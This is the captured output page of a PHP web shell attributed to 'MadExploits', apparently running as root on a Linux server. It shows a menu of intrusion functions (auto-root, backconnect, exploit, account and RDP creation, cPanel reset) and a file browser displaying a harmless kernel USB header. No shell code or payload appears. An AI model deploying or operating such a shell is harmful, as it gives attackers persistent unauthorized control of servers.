Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.14.243
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
linux /
usb /
[ HOME SHELL ]
Name
Size
Permission
Action
audio.h
19.03
KB
-rw-r--r--
cdc-wdm.h
739
B
-rw-r--r--
cdc.h
13.16
KB
-rw-r--r--
ch11.h
8.83
KB
-rw-r--r--
ch9.h
39.23
KB
-rw-r--r--
charger.h
598
B
-rw-r--r--
functionfs.h
16.26
KB
-rw-r--r--
g_hid.h
1.22
KB
-rw-r--r--
g_printer.h
1.35
KB
-rw-r--r--
g_uvc.h
1.14
KB
-rw-r--r--
gadgetfs.h
2.76
KB
-rw-r--r--
midi.h
3.35
KB
-rw-r--r--
raw_gadget.h
8.38
KB
-rw-r--r--
tmc.h
4.74
KB
-rw-r--r--
video.h
16.89
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : g_hid.h
/* SPDX-License-Identifier: GPL-2.0+ WITH Linux-syscall-note */ #ifndef __UAPI_LINUX_USB_G_HID_H #define __UAPI_LINUX_USB_G_HID_H #include <linux/types.h> /* Maximum HID report length for High-Speed USB (i.e. USB 2.0) */ #define MAX_REPORT_LENGTH 64 /** * struct usb_hidg_report - response to GET_REPORT * @report_id: report ID that this is a response for * @userspace_req: * !0 this report is used for any pending GET_REPORT request * but wait on userspace to issue a new report on future requests * 0 this report is to be used for any future GET_REPORT requests * @length: length of the report response * @data: report response * @padding: padding for 32/64 bit compatibility * * Structure used by GADGET_HID_WRITE_GET_REPORT ioctl on /dev/hidg*. */ struct usb_hidg_report { __u8 report_id; __u8 userspace_req; __u16 length; __u8 data[MAX_REPORT_LENGTH]; __u8 padding[4]; }; /* The 'g' code is used by gadgetfs and hid gadget ioctl requests. * Don't add any colliding codes to either driver, and keep * them in unique ranges. */ #define GADGET_HID_READ_GET_REPORT_ID _IOR('g', 0x41, __u8) #define GADGET_HID_WRITE_GET_REPORT _IOW('g', 0x42, struct usb_hidg_report) #endif /* __UAPI_LINUX_USB_G_HID_H */
Close